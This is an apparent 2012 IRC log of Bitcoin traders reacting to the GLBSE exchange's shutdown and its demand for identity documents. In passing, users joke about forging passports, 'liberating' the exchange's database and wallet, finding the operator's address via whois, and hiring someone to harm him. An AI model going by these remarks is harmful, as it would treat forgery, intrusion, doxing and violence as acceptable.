7.6243 BTC [-] Oct 10 04:37:12 lol, thanks for analizing so deeply my little trade, smickles and mircea_popescu Oct 10 04:37:23 lol Oct 10 04:38:02 http://shrani.si/f/2g/3E/ACzC6Q1/hrm.png Oct 10 04:38:03 so Oct 10 04:38:07 these are sorted by date Oct 10 04:38:12 And, yes, the time value is why I tend to buy put of as low as a strike as possible Oct 10 04:38:17 how does phrausts rating make sense? Oct 10 04:38:28 Just as an insure Oct 10 04:38:32 (date is last change) Oct 10 04:39:01 kakobrekla maybe ? Oct 10 04:39:15 ;;gettrust pirateat40 Oct 10 04:39:16 Trust relationship from user mircea_popescu to user pirateat40: Level 1: -1, Level 2: 22 via 19 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=pirateat40 Oct 10 04:39:19 maybe what Oct 10 04:40:02 maybe it makes sese. Oct 10 04:40:10 i could envisage situations in which it made sense. Oct 10 04:40:24 heh, rdponticelli i just wanted you (well, i suppose it was you now) to buy some of my puts :p Oct 10 04:40:59 Do you sell puts? Oct 10 04:41:22 rdponticelli: the 269 left on http://polimedia.us/bitcoin/mpex.php?mpsic=O.BTCUSD.P140T Oct 10 04:41:34 Oh... Oct 10 04:41:36 lol Oct 10 04:41:43 [MPEX] [S.MPOE] 2417 @ 0.00031259 = 0.7555 BTC [+] Oct 10 04:43:41 smickles you need a newsletter for your brokerage customers :D Oct 10 04:43:58 kakobrekla: maybe it was >1, but was lowered to 1 afterthe bad news Oct 10 04:44:04 I don't even use to look at orders books of puts of too high a strike Oct 10 04:44:45 As mircea said, almost all of it's value is time based Oct 10 04:53:38 claim process opened on glbse,com Oct 10 04:53:50 log in to get your bitcoins Oct 10 04:54:46 o hey! Oct 10 04:55:54 what? Oct 10 04:56:07 oO, yay Oct 10 04:56:51 seems so. Oct 10 04:57:43 yea, it wants photo ID Oct 10 04:57:45 so I'm fucked \o/ Oct 10 04:57:53 no way? Oct 10 04:57:58 yes way Oct 10 04:58:06 D: Oct 10 04:58:09 To comply with money laundering regulations we must ask you to submit documents for proof of your address and identity.Picture of your IDPlease provide a clear picture of your photo ID. For France, Germany, Spain, and English speaking countries ID cards, Passports and drivers licences are accepted, for everywhere else only passports are accepted. Oct 10 04:58:18 oh hey, GLBSE has been upgradede, quite fast nao Oct 10 04:58:31 not sure wtf I'm supposed to do, I don't have a passport or drivers license Oct 10 04:58:55 wat Oct 10 04:58:59 ffs. Oct 10 04:59:14 well so at least now we know Oct 10 04:59:20 yea Oct 10 04:59:21 lol dud Oct 10 04:59:23 dub* Oct 10 04:59:34 shame nefario isn't here, I really need an alternative way of verifying Oct 10 04:59:45 unless I go apply for a passport and come back in like 6 weeks Oct 10 04:59:46 :/ Oct 10 04:59:52 youy should get a passport and drive to britain Oct 10 04:59:58 Azelphur: support@glbse.com Oct 10 05:00:02 to verify with him personally Oct 10 05:00:05 dub: step 1) get a passport and drive to where I already am Oct 10 05:00:19 smickles: good idea, I'll send him an email Oct 10 05:00:36 lol srsly Oct 10 05:00:45 i wont give my pass to nef for my 5 smickes shares Oct 10 05:00:47 Azelphur: i might have his personal email, one sec Oct 10 05:00:54 well - as a verified asset issuer this is BS Oct 10 05:00:58 smickles: fun Oct 10 05:01:18 already went through all this once - he doesn't need another copy of this that he can lose Oct 10 05:01:35 Fuck them Oct 10 05:01:39 feds need copies in triplicate Oct 10 05:01:46 haha Oct 10 05:02:07 I'll have to take a passport to recover my fucking assets? Oct 10 05:02:08 dub should get a special hat./ Oct 10 05:02:21 i wont do it. Oct 10 05:02:37 mircea_popescu: wai? Oct 10 05:02:54 cause you're funnay. Oct 10 05:03:00 Who gets sent physical bills anymore? I have to call my tax commissioner to get proof of resident? Such an inconvenience... Oct 10 05:03:03 anyone else got their heat runnign yet ? Oct 10 05:03:14 thestringpuller so pull some strings. Oct 10 05:03:38 lol I don't think it's worth it. Cut da losses. Oct 10 05:04:05 yep Oct 10 05:04:12 i down like 5 btc Oct 10 05:04:14 Serves me right for trusting someone who codes a website with bootstrap. Oct 10 05:04:16 I'd like to cut something Oct 10 05:04:22 Serves me right for trusting someone who codes a website with bootstrap. << this. Oct 10 05:04:44 They probably use mysql :P Oct 10 05:04:57 With all the money they were raking it shoulda gotten an oracle license Oct 10 05:06:20 ;;rate nefario -10 scammer Oct 10 05:06:21 Rating entry successful. Your rating of -10 for user nefario has been recorded. Oct 10 05:06:35 LOL Oct 10 05:06:39 Poor nefairo Oct 10 05:06:41 ;;gettrust nefario Oct 10 05:06:42 Nefario* Oct 10 05:06:42 Trust relationship from user mircea_popescu to user nefario: Level 1: -1, Level 2: -4 via 6 connections. Graph: http://serajewelks.bitcoin-otc.com/trustgraph.php?source=mircea_popescu&dest=nefario Oct 10 05:07:04 i guess hisnew and legit exchange will hit the ground runnin Oct 10 05:07:10 aw fuck Oct 10 05:07:19 I just moved, i have no proof of address Oct 10 05:07:25 [MPEX] [S.MPOE] 26463 @ 0.00031122 = 8.2358 BTC [-] Oct 10 05:07:25 After he goes through 4 years of paperwork Oct 10 05:07:26 [MPEX] [S.MPOE] 53937 @ 0.00031122 = 16.7863 BTC [-] Oct 10 05:07:55 thestringpuller at an estimated cost of 8mn a year. Oct 10 05:07:59 ;;rate nefario -10 rich scammer Oct 10 05:08:00 Rating entry successful. Your rating for user nefario has changed from -10 to -10. Oct 10 05:08:02 which he certainly has access to Oct 10 05:08:10 Oct 10 05:08:26 I read that as 'the estimated cost of a 9mm' Oct 10 05:08:35 and I though, now there is a solution! Oct 10 05:08:45 lol Oct 10 05:08:54 someone should invent a p2p dividend paying system Oct 10 05:09:09 called accounting 101 =P Oct 10 05:09:33 I just sent this to nefario lol http://pastebin.com/dCxCs8qr Oct 10 05:09:34 <[\\\]> So whats to stop nefario from using all of these documents to commit identity theft? Oct 10 05:09:35 <[\\\]> he isn't licensed Oct 10 05:09:35 <[\\\]> he doesn't have a personal bond Oct 10 05:09:36 he's an awesome dude? Oct 10 05:09:41 and wouldnt fuck us ever Oct 10 05:09:56 <[\\\]> lol Oct 10 05:09:57 lol that'd be the end all. nefario takes off with some k btcs and sells everyone's ids on SR Oct 10 05:10:03 <[\\\]> exactly Oct 10 05:10:16 then like... makes a video from puerto vallerta Oct 10 05:10:31 You can find his address if you put glbse.com into the networksolutions whois Oct 10 05:10:44 but I heard doxing is bad mmmkay Oct 10 05:11:04 who.is is the best for DNS info Oct 10 05:11:04 https://bitcointalk.org/index.php?topic=117453.msg1260985#msg1260985 Oct 10 05:11:04 :P Oct 10 05:11:11 so if people's identity leaked I see him getting beat up maybe? Oct 10 05:11:16 <[\\\]> he's asking for the same info that I'd be required to present to get a replacement state id Oct 10 05:11:25 <[\\\]> he could get a government id in my name Oct 10 05:11:33 <[\\\]> and I'm supposed to just give it to him? Oct 10 05:11:36 <[\\\]> LOL Oct 10 05:11:42 and your first born child Oct 10 05:12:09 jebus, even my lease is electronic Oct 10 05:12:21 <[\\\]> all of my utility bills are electronic Oct 10 05:12:47 I haz no proof of address within nef's requirements Oct 10 05:13:08 <[\\\]> and let's face it, a picture of 'me' holding my name/date on a piece of paper could be photoshopped Oct 10 05:13:13 NO ASS ET&C FOR YOU Oct 10 05:13:14 <[\\\]> this isn't 1998 anymore Oct 10 05:13:25 [\\\] you should totally photochop some Oct 10 05:13:30 like, obama holding one Oct 10 05:13:35 we should have like a photochop contest Oct 10 05:13:40 <[\\\]> is it illegal to submit false docs to nefario? Oct 10 05:13:42 <[\\\]> :-x Oct 10 05:13:50 it's illefarian Oct 10 05:14:08 illefarian Oct 10 05:14:10 im stealing that Oct 10 05:14:13 thx Oct 10 05:14:24 yw Oct 10 05:14:28 rule 4 waiver hereby. Oct 10 05:14:40 <[\\\]> what's rule 4? Oct 10 05:14:59 rule 4: give all ideas to grubles Oct 10 05:15:05 Lol, FoxConn goes on strike apple plummets 15%+ Oct 10 05:15:06 <[\\\]> oh, right Oct 10 05:15:08 step 2. profit Oct 10 05:15:14 step 3. keep all profit Oct 10 05:15:18 a month for short selling Oct 10 05:16:06 mircea_popescu: does make me wonder if I photoshopped a passport if it'd work Oct 10 05:16:10 baring in mind I don't actually have one Oct 10 05:16:17 <[\\\]> lol Azelphur Oct 10 05:16:22 can't hurt anything. Oct 10 05:16:26 xD Oct 10 05:16:29 actually, chop a few wh8ile you're at it. Oct 10 05:16:35 I sent him an email asking if there's any way I can alternatively auth for now, anyway Oct 10 05:16:50 <[\\\]> I would think auth'ing via 2fact is enough to prove I am me Oct 10 05:16:52 I'm quite happy to auth (heck, my address is on my DNS whois, it's all obvious) xD Oct 10 05:16:58 <[\\\]> it was for 6 months or however long it was Oct 10 05:18:30 well, i can confirm that you can't just skip the photo upload Oct 10 05:18:35 DNS record != passport copy Oct 10 05:18:47 kakobrekla: never said it was XD Oct 10 05:18:52 "spread your cheeks and lift your sack" Oct 10 05:18:58 you act like it is. Oct 10 05:19:06 no, I don't. Oct 10 05:20:40 thestringpuller, that only applies if one is afro-american Oct 10 05:20:43 kakobrekla: i'm sure he was just pointing out that he doesn't care if people know his addy Oct 10 05:21:00 ^ is what I was trying to do :p Oct 10 05:21:21 btw, i don't either Oct 10 05:21:22 mine is: Oct 10 05:21:25 12NjnZTVeTJ3g5C7BqfS2aQ2rLkmwiqVz6 Oct 10 05:21:32 haha Oct 10 05:21:34 o/ Oct 10 05:21:49 <[\\\]> he can have a copy of my sensitive documents just as soon as I get a copy of his surety bond Oct 10 05:23:04 sensitive documents? Oct 10 05:23:05 -.- Oct 10 05:23:11 <[\\\]> yeah Oct 10 05:23:17 <[\\\]> copy of government id, utility bill Oct 10 05:23:26 <[\\\]> all the things required to get valid government id in my name Oct 10 05:23:29 <[\\\]> oh, ok Oct 10 05:23:35 <[\\\]> sure, steal my identity Oct 10 05:23:40 <[\\\]> first my coins, now my usd Oct 10 05:23:44 .... Oct 10 05:23:50 [10:21:52] <[\\\]> he can have a copy of my sensitive documents just as soon as I get a copy of his surety bond Oct 10 05:23:52 lawyerporn. Oct 10 05:23:59 http://omgdroid.com/wp-content/uploads/2012/07/RageFace.jpg My photo ID Oct 10 05:24:23 <[\\\]> lol Oct 10 05:25:18 data:image/jpeg;base64,/9j/4AAQSkZJRgABAQAAAQABAAD/2wCEAAkGBhMSERUUExQWFRQVGBcaFxcYGBocHBwYGBgcHhwcGBwaHCYeHBkjGhwdHy8gIycpLCwsGB4xNTAqNSYrLCkBCQoKDgwOGg8PGiwlHCQqLCktLiwsLCwsLCwsLCksKSksLCwsLCwsLCwsKSwsLCkpLCkpLCksLCwsLCksKSwsKf/AABEIAK8BDgMBIgACEQEDEQH/xAAcAAACAgMBAQAAAAAAAAAAAAAFBgMEAQIHAAj/xABFEAACAQIDBgMEBgkCBQQDAAABAhEAAwQSIQUGEzFBUSJhcTJSgaEHI5Gx0fAUFUJicnOyweEWMyQ0Q5LSJVOiwoKT8f/EABoBAQEBAQEBAQAAAAAAAAAAAAACAQMEBQb/xAAxEQ Oct 10 05:25:18 ACAgEDAwIDBQkAAAAAAAAAAQIRAxIhMQQTQRRRkaGiBWFygbEVIlKCwdHh8PH/2gAMAwEAAhEDEQA/AOpYnbKqMljLkiFKREn3Y8IA1+PprQu37jasZP57UAtY8AwHYASB4RoByipLm1VUEm60D90V8VfacW/+H1p9E/AXYv0iso7dTFLw3ps/++f+0V7/AFGhYrx2ntlFdfXr2/T+5y9I/wDbGIue9ZUtEn+1LQ3mtxPHYgGCcg61Ku8KSBxmzEAgZB11p69Lx+g9IxiUMfT0r0NQLbe9S4PCm85Lk6WwQBmPQd/M0P3Z/TcXYF+7iGtZ9US2iABehJYEt8q+rhhLLi7rdL7/APB48iUZaRuKt+RWeG35FL+6208U1/EYfEBW4BTLdVcucPqJXl7Parm+e8X6HhLl0RniLYPLOeWnbqartSU Oct 10 05:25:18 9C3bItVYSZX6VquadYqhuzvGuLw9u6ObDxeTrow+3Wlr6TN5sTguE1h1AuZgQUDagTIP9qrHgnPJ2/JjaSsdwrV4zVbYV92sW2dszMqkmANWAOgHTWqW+W0LlnCXblpsropYGAw06EEedc1CTnove6K2q6CuQ/kVhgw9PT/NKG523cTisDcvXLg4hLhSEUBco006/GhW4u8uNx/GDXwht5Iy2kIObNzn0r0vpZ1J2v3SNa9jomRuhE1hg3lSzszFY21iWTE3Ld2yUYrcRAsMupDgcvDPlVDY29N7aOJdbDm1hrUSwUF3kkAgkEKNOUVHppbu1S8jUvYcvH5VuA3ekvbO89/Z+Iti83Gw1zkzAB0IInUABhBmIGlZ+kDem9hrVq9h7igOSCCgYEZZDDqDWx6abcUnzwNUfYczm8v715VY8vuNJ Oct 10 05:25:23 e2NqYu1gBiUxAZgiOQ9pIhgJiNZ1ojulvM+NwbXI4dwFkLASMwAOYA8wZ1o+mmo672ugpK+BkdW0rJRh1rlOxfpMxNvEBMaQbbAeIKAVnk0DmD1FN+9GLxP1Bwt8Ktx0tsCqsIfUOpI9dOtVk6SeOSi2t/IUosaINeFs9/lSH9IW8+JwX6PwbujyGzIpkqF8XLQmTpyp7wTsLa5mzGBLEAEn0GlcsmGUIKbezKTV1Rowby+dbKp8vhSlvBv6tjH2cP8AsHS6SORYDJHodT60bxuMyNBdxPYCK8fVzl00FOa2Z2wY1llSCBZqwC1Brm2EUEtdcAczlFU23rs/+9c1PPKsV81faSfCfyPY+jrkZiDXgTHOltt5rQbLxrmYfur0FY/1RZyzxrkAxyXnzq/2h9zM9J94w3JOjQR8vjRDD7cttKYkI Oct 10 05:25:25 <[\\\]> wtf Oct 10 05:25:28 ? Oct 10 05:25:28 QNQzCQTJ/Zy6QDEzSg28KZgvFuEmNIXkah2rjwEBzP7Q0IHUH8KqHXxc1F+TH00oxtf1M4YuSfGnM+73pY3z3jZHWxzmC5VZAnlqB8adMNsEGRmIgnp/mpLm7X7/wAq+Z0+PLCevRa/FR7suTHKNaq/I5hc28XlgPqrAEEqRmJ5QMsmW1jsKr43EXltrefLF0mAJLazqVC6CPvFdUTdqf2/kKk/0wPf+X+a+h38y4x/UeTt4fM/kcn2nthrRW1AJWGaASMzCYmOggHSmvdW3cuA4hyoZ5y5oERpyIkU0jdsSfEfs/zUq7rfvfL/A Oct 10 05:25:30 this isnt css. Oct 10 05:25:34 fuck Oct 10 05:25:35 noagendamarket: what are you doing? Oct 10 05:25:37 <[\\\]> he pasted an image in here Oct 10 05:25:46 <[\\\]> data:image/jpeg;base64,/9 Oct 10 05:25:54 oh lol Oct 10 05:25:57 I love data encoded urls in css, btw Oct 10 05:26:00 <[\\\]> quick, someone put it back together Oct 10 05:26:04 saves a fuckton on uselessly tiny images Oct 10 05:26:29 http://i.imgur.com/0z0zp.gif Oct 10 05:26:39 Word on the street is that when you actually give it your passport / drivers license it just throws 413 errors. Oct 10 05:26:40 yeah ill give nefario my pic, but its gonna be this one http://shrani.si/f/22/Pg/2vwHW4QN/94211314332323786455114n.jpg Oct 10 05:26:46 not fake. Oct 10 05:26:51 lol Oct 10 05:27:09 lol Oct 10 05:29:12 <[\\\]> ahhhh, kiddie pr0n Oct 10 05:29:17 the other fun part is that I'm planning on moving soonish Oct 10 05:29:23 so, any info I provide now Oct 10 05:29:26 will be invalid in <2 months Oct 10 05:29:45 I dont have any proof of address or even ID Oct 10 05:29:56 Im a ghost :P Oct 10 05:29:58 noagendamarket: welcome to the club Oct 10 05:30:09 well I have some proof of address, but no photo id Oct 10 05:30:09 I have a PO box lol Oct 10 05:30:19 No fixed address Oct 10 05:30:37 and no utility bills :P Oct 10 05:32:39 [MPEX] [S.MPOE] 16174 @ 0.00031122 = 5.0337 BTC [-] Oct 10 05:32:40 [MPEX] [S.MPOE] 31100 @ 0.00031121 = 9.6786 BTC [-] Oct 10 05:32:41 [MPEX] [S.MPOE] 24626 @ 0.00031115 = 7.6624 BTC [-] Oct 10 05:33:47 I live under a bridge Oct 10 05:34:09 how will I recover my DMC share now Oct 10 05:34:45 thats the point :( Oct 10 05:34:57 very few people will bother Oct 10 05:35:05 dub, tithe at #bitcoin-church Oct 10 05:35:22 thats why i commented my rating rich scammer Oct 10 05:35:27 pirate is a poor scammer Oct 10 05:35:41 if he donates the leftover coins to the bitcoin foundation Ill be pissed lol Oct 10 05:36:22 someone should liberate that db and wallet Oct 10 05:36:46 I was thinking Oct 10 05:36:51 thats actually not a bad plan Oct 10 05:37:17 i don't think it would even be theft Oct 10 05:37:25 dub, no Luke-Jr is not allowed Oct 10 05:37:28 rtheft ? Oct 10 05:37:53 instead of gitmo/SEC holiday camp, nefario could have his data stolen the hacker benevolently returning everyones shit Oct 10 05:37:57 grubles: you really want to recruit trolls? Oct 10 05:38:24 dub: ideally, yes. even taking a fee for services rendered would be better than this Oct 10 05:38:41 sounds like business plan Oct 10 05:38:56 5% sounds fair to me Oct 10 05:38:59 a notquitedeadmans switch Oct 10 05:39:05 what i want to know is Oct 10 05:39:11 that's going to net them a fair amount of btc Oct 10 05:39:13 what fucking money laundering would be going on with glbse ? Oct 10 05:39:17 EVERYTHING THERE LIOST MONEY Oct 10 05:39:27 lol Oct 10 05:39:33 it's moeny laundering or money shrinking ? Oct 10 05:39:48 Luke-Jr, maybe...i like living life on the edge Oct 10 05:39:54 glbse is that asshole laundromat that shrinks your load. Oct 10 05:40:30 it works if you issue mining turds Oct 10 05:41:08 heh, what's the cupizz code? Oct 10 05:41:15 EvanR: tanking Oct 10 05:42:02 smickles cusip you mean ? Oct 10 05:42:08 dub thankee pardner Oct 10 05:46:28 do issuers need to re-verify to get the info I wonder Oct 10 05:46:39 they need to re-issue Oct 10 05:47:47 if I have no btc or shares in my account because I only issued an asset, why cant the email address for my account recieve shareholder data (assuming shareholders verify)? Oct 10 05:47:54 I cant login to my glbse account? Oct 10 05:47:55 whats up Oct 10 05:47:57 heh Oct 10 05:57:03 wow Oct 10 05:57:14 nefario is really going out of his way to try to kill things Oct 10 05:57:46 [MPEX] [S.MPOE] 783 @ 0.00031115 = 0.2436 BTC [-] Oct 10 05:58:05 btw folks once you send your id stuff to nefario cc them to me too Oct 10 05:58:11 who knows, maybe i need some id's sometime. Oct 10 06:02:58 <[\\\]> I think nef should hire zhou Oct 10 06:03:08 <[\\\]> at least then we'd figure out who the hacker was in about 10 minutes Oct 10 06:03:14 <[\\\]> and then get 49% of our coins back Oct 10 06:04:59 dude this is cut and dried intersango process Oct 10 06:05:12 i agree with my forespeakers. Oct 10 06:05:31 <[\\\]> didnt nef work for intersango? Oct 10 06:05:53 yes. Oct 10 06:05:55 he's certainly familiar to those scamming fucks IRL Oct 10 06:06:10 they're a little group, that london failference was pretty much them and streetwalkers. Oct 10 06:06:30 UK has always been full of pirates Oct 10 06:06:39 theymos, phantom, gengix, nefario.. its a scammers anal chain Oct 10 06:08:36 so this is funny. in nefario's speach here in this video http://youtu.be/vmPD_YSQ--k he talks about how you dont need to provide id for glbse. Oct 10 06:08:36 :P Oct 10 06:08:39 thats the advantage Oct 10 06:08:47 sounds like a lie Oct 10 06:08:55 no Oct 10 06:09:00 at roughly 4min in Oct 10 06:09:11 it sounds like like like like like like like like like a like lie Oct 10 06:09:18 lol Oct 10 06:09:23 http://www.youtube.com/watch?v=-ut-1Ofy2vI dub you remind me of this guy Oct 10 06:10:48 that video is one second too long to remind you of me Oct 10 06:11:09 lol Oct 10 06:11:51 how much more gouging is he requiring for issuers? Oct 10 06:12:26 /item/7a9ac139d2 << lol Oct 10 06:12:36 what kind of id is he requiring? Oct 10 06:12:40 pigeons: passport, drivers Oct 10 06:12:41 and then i guess he needs to "review" it? Oct 10 06:12:44 shit Oct 10 06:12:50 just give it all back and be done Oct 10 06:13:08 pigeons: also a photo of a document proving address Oct 10 06:13:19 shoe on head too? Oct 10 06:13:27 sort of Oct 10 06:13:45 a photo of yourself with a paper signed "glbse" and your username Oct 10 06:13:58 specifically a 'clear' photo Oct 10 06:14:18 that's unprecedented Oct 10 06:14:18 no writing "/b" on your hand in a photo? Oct 10 06:14:56 its not like the usernames and passwords wer eleaked and he needs to verify Oct 10 06:18:37 so how exactly are the "assets" going to be returned to you? Oct 10 06:18:59 pigeons : shoe on head, sharpie in pooper and stfu. Oct 10 06:19:24 personal delivery Oct 10 06:20:27 I ain't giving Nefario so much as a pic of my big middle finger. Oct 10 06:20:50 he's gonna make out like a bandit heh Oct 10 06:21:02 Funny you should use that term. Oct 10 06:21:06 lol Oct 10 06:21:13 B0g4r7 start a forum thread Oct 10 06:21:18 pun intended. dont worry Oct 10 06:21:22 "Fuck you nefario. No ids. Cough up the lists" Oct 10 06:21:55 if enough people sign... this won't go anywere in a DIFFERENT WAY from the way nefario was going to have it nowhere Oct 10 06:22:03 which seems like... i dunno, a sort of win. Oct 10 06:22:07 "You said just a few weeks ago, the advantage of GBLSE is no AML requirements" *link to youtube* Oct 10 06:22:59 [MPEX] [S.MPOE] 19337 @ 0.00031115 = 6.0167 BTC [-] Oct 10 06:23:00 [MPEX] [S.MPOE] 10200 @ 0.00031106 = 3.1728 BTC [-] Oct 10 06:23:01 [MPEX] [S.MPOE] 29200 @ 0.00031102 = 9.0818 BTC [-] Oct 10 06:23:02 [MPEX] [S.MPOE] 13263 @ 0.00031087 = 4.1231 BTC [-] Oct 10 06:24:17 Ukto: Post it. Oct 10 06:24:20 in the thread Oct 10 06:24:59 [22:06] so this is funny. in nefario's speach here in this video http://youtu.be/vmPD_YSQ--k he talks about how you dont need to provide id for glbse. about 4min in Oct 10 06:25:00 go for it Oct 10 06:25:03 i dont touch forums Oct 10 06:27:49 http://www.encyclopediabitcoinica.com/wiki/GLBSE Oct 10 06:28:36 ? Oct 10 06:31:45 Nice domain. Oct 10 06:34:35 Posted. https://bitcointalk.org/index.php?topic=117539.msg1261229#msg1261229 Oct 10 06:40:49 Does anyone else have the urge to slap this Rarity poster silly? Oct 10 06:41:07 that's useless. Oct 10 06:41:17 you need a new thread, and an actual ideea for people to gather round. Oct 10 06:41:39 I think that's more your specialty. Oct 10 06:41:55 lol Oct 10 06:42:12 anyway, im off. hold down the fort all! **** BEGIN LOGGING AT Wed Oct 10 17:26:52 2012 Oct 10 17:29:45 Update:we are currently unable to process account closures, and will inform our users when this service resumes. Oct 10 17:29:46 lmao Oct 10 17:30:02 any suckers that already dumped their ids ? Oct 10 17:30:09 nice Oct 10 17:30:30 lol Oct 10 17:30:35 beyond silly. Oct 10 17:30:38 I wonder why it's closed Oct 10 17:30:40 Update:we are currently unable Oct 10 17:31:05 this is so bitcoin consultancy-y Oct 10 17:31:14 That's the end of the sentence Oct 10 17:31:22 It could be mentally unable Oct 10 17:31:40 Or a lot of others thing, just fill the gap Oct 10 17:34:52 I guess they all have corsair patents Oct 10 17:35:09 And are stealing for the crown Oct 10 17:35:18 sorry we accidentaly the database and are unable to process Oct 10 17:35:33 The old british empire is back Oct 10 17:38:04 pigeons but its bycrpt Oct 10 17:39:23 can't hack bcrypt of course Oct 10 17:39:50 Anyway, as they deserve some fucking respect, they're not corsairs, they're all just privateers Oct 10 17:39:54 best solution on the market. Oct 10 17:40:15 rdponticelli privateers they're not, they go running to the govt way too often and in ridiculous ways Oct 10 17:40:17 ok then, sorry, we have been served a restraining order and are unable to process Oct 10 17:40:26 Dr. Nefario, Esq. Oct 10 17:40:55 pigeons : today when we were at the mcdonalds the waitress looked at us a certain way and on the napkins was certain scribbled something from the prevbious patron who was this suspicious guy Oct 10 17:41:24 therefore we consider we have been served a restraining order by the algerian president and will not be processing anything Oct 10 17:41:25 fify. Oct 10 17:41:29 mircea_popescu: privateers were often hired by the government Oct 10 17:41:56 no they weren't Oct 10 17:42:56 "The person that controls this address should be someone honorable that everyone trusts. And maybe he should be anonymous because the intend of this bounty maybe isnt fully legal." Oct 10 17:43:11 people in bitcoin. they're the intellectual cream of the crop Oct 10 17:43:20 mixed with a good scraping off the bottom of the barrel. Oct 10 17:43:26 I sent James a note asking why he needs my dox when he has them already (I verified before) Oct 10 17:43:37 teust i will never get a response Oct 10 17:43:41 trust* Oct 10 17:49:47 [MPEX] [S.MPOE] 52800 @ 0.00031226 = 16.4873 BTC [+] Oct 10 17:49:48 [MPEX] [S.MPOE] 16350 @ 0.00031134 = 5.0904 BTC [-] Oct 10 17:59:18 *yawn* morning Oct 10 17:59:35 so, anyone dareing enough to send nef. docs yet? Oct 10 17:59:53 Ukto: the owner of bitinstant tried and got 413 errors Oct 10 17:59:54 he already has mine Oct 10 18:00:05 lol Oct 10 18:00:08 Ukto it's finished, they have an update, "can't process" anymore. Oct 10 18:00:49 lol nice Oct 10 18:02:18 JWU_42: his plan worked for me. I checked my records, I had left 2btc there + whatever divs my 30 shares of JAH produced since may. Oct 10 18:02:40 He can have it. I will not give him any docs. Oct 10 18:03:02 Ukto i'd be surprised if 10% of accts give docs Oct 10 18:03:13 i doubt he didn;'t know this. it's just scam furtherance is all. Oct 10 18:03:17 I would be surprised if ti was that high Oct 10 18:03:40 well Oct 10 18:05:01 lets be honest its one of wo possibilities, A. either further scammation, and attempt to conceal embezzled funds. B. Epic stupidity. At this point, I put neither past him. Oct 10 18:05:09 Either way, he already won. Oct 10 18:05:14 "won" Oct 10 18:05:21 he already ran off with people's money. yes, he did. Oct 10 18:05:43 he doesnt say what happens to the assets and funds of those who dont submit docs Oct 10 18:05:48 sure he wont accept them for years Oct 10 18:05:50 surely Oct 10 18:06:06 well... he has to, doesn't he ? Oct 10 18:06:11 aml docs must be kept for 7 years. Oct 10 18:06:36 no, I ment to accept account claims Oct 10 18:06:45 he cant leave "claims" system open for years Oct 10 18:07:04 but you guys know where hi lives and what's his name. :) Oct 10 18:07:09 at some point it gets shut off and what.. he just gets to keep the remaining everything? anony contacts issuers "heres my shares" Oct 10 18:07:11 and claim divs from that? Oct 10 18:07:23 EskimoBob: and what he looks like. Oct 10 18:07:47 I am honestly surprised he would pull this, after going to that bitcoin london conference Oct 10 18:08:00 so, friends from Ukraine can drill holes to his kneecaps for almost nothing (compared to what he stole) Oct 10 18:08:07 i am partially leaning towards epic stupidity coupled with second hand scamming Oct 10 18:08:41 though, its funny, in that video, he mentioned he needed $200 REALLY badly. Oct 10 18:08:51 what video Oct 10 18:08:57 1 sec Oct 10 18:09:23 http://youtu.be/vmPD_YSQ--k Oct 10 18:09:47 he mentioned how he needed $200 SOOO BADLY for some sponsorship stuff at one point Oct 10 18:09:53 cause he couldnt wait for a gox xfer Oct 10 18:10:35 keep in mind, glbse didnt profit that much off of trades guys Oct 10 18:10:39 this isnt mtgox volume Oct 10 18:10:51 his internet was via tethered cell phone Oct 10 18:11:44 you know if someone were to partner with me with a decent idea Oct 10 18:11:51 you wouldn't ever have to beg for 200$ Oct 10 18:12:13 stupid little man James McCarthy Oct 10 18:12:23 ijs Oct 10 18:12:31 $200 is a couple hours work Oct 10 18:14:50 [MPEX] [S.MPOE] 9886 @ 0.00031134 = 3.0779 BTC [-] Oct 10 18:14:50 [MPEX] [S.MPOE] 9323 @ 0.00031027 = 2.8926 BTC [-] Oct 10 18:14:52 [MPEX] [S.MPOE] 17491 @ 0.0003101 = 5.424 BTC [-] Oct 10 18:17:20 Ukto they were making about 4-500 each month Oct 10 18:17:31 course, also had a huge debtload they were paying off. Oct 10 18:18:17 heh, mebbe recently Oct 10 18:18:25 at least in may, nefario seemed pretty broke Oct 10 18:19:01 his personal finances aren't much related to the results of glbse Oct 10 18:19:10 they depended on how much "salary" he could leach off the partners Oct 10 18:19:21 leech* Oct 10 18:21:15 "I would consider meeting this criteria if nefario were to provide me with a HD photo of his passport, drivers licence, 2 utility bills and a picture of him holding a note saying "you must be fucking joking" and a hot chick doing "bunny ears" on him." - LOL :) Oct 10 18:22:18 this is unfair. how's the guy to find a hot chick now ? Oct 10 18:22:27 if it were at all possible it'd have happened in his 20s Oct 10 18:23:00 I just finished off a talk with James :) Oct 10 18:23:16 We had a good laugh about all the paranoid people on the forums :P Oct 10 18:25:28 o hey, welcome to my ignore again! Oct 10 18:25:32 da2ce7 darkee| DeaDTerra Diablo-D3 dub dvide Oct 10 18:25:34 DeaDTerra!*@* added to ignore list. Oct 10 18:25:41 this guy has got to be stupid or something. Oct 10 18:36:08 So during all this usagi flew the coop eh Oct 10 18:36:29 though to be honest Oct 10 18:36:48 for the 90% who dont give ID, etc.. how are the asset issures supposed to 'continue their relationship' Oct 10 18:36:58 how are the issuers supposed to continue at all Oct 10 18:37:17 "well, i have identified 5% of my shares ownerships. guess I go with that" ? Oct 10 18:37:20 what does he expect? Oct 10 18:37:59 what stops nefario from using ppl 'codes' and anon-claiming to be a share holder to an issuer Oct 10 18:38:26 mostly for the ppl who dont ID within X Oct 10 18:40:00 With all this, and his paranoia, ppl knowing his name, face, etc, I am surprised he's trying to piss ppl off Oct 10 18:40:38 [MPEX] [S.MPOE] 32700 @ 0.00031103 = 10.1707 BTC [+] Oct 10 18:40:58 he needs to just reenable the site, let ppl 'transfer shares' w/o penalty and a note to distinguish themselves to the issuers Oct 10 18:41:00 and be done with it Oct 10 18:41:37 you better not ignore me mircea_popescu Oct 10 18:41:49 0,o Oct 10 18:42:03 i'll start a smear campaign about something Oct 10 18:43:52 DeaDTerra: wtf is James? Oct 10 19:01:40 ukto a code system wont work Oct 10 19:02:00 regardless Oct 10 19:02:10 a system wont work if nefario wont give out everyones assets Oct 10 19:02:16 joelcatz or whatever his name is has covered this about 10 times on the forum very well. Oct 10 19:02:20 yeah Oct 10 19:02:22 he is witholding things unless ppl give him all sorta id's Oct 10 19:02:26 neferio is just being a cock Oct 10 19:02:34 yes, yes he is Oct 10 19:02:37 however Oct 10 19:02:46 while the code system wont allow ppl to trade offline Oct 10 19:02:54 it would allow the importation of the assets Oct 10 19:02:58 into another system Oct 10 19:03:03 people have been trading tygrr codes already Oct 10 19:03:12 which is dumb Oct 10 19:03:23 any system woudl be first come first serve Oct 10 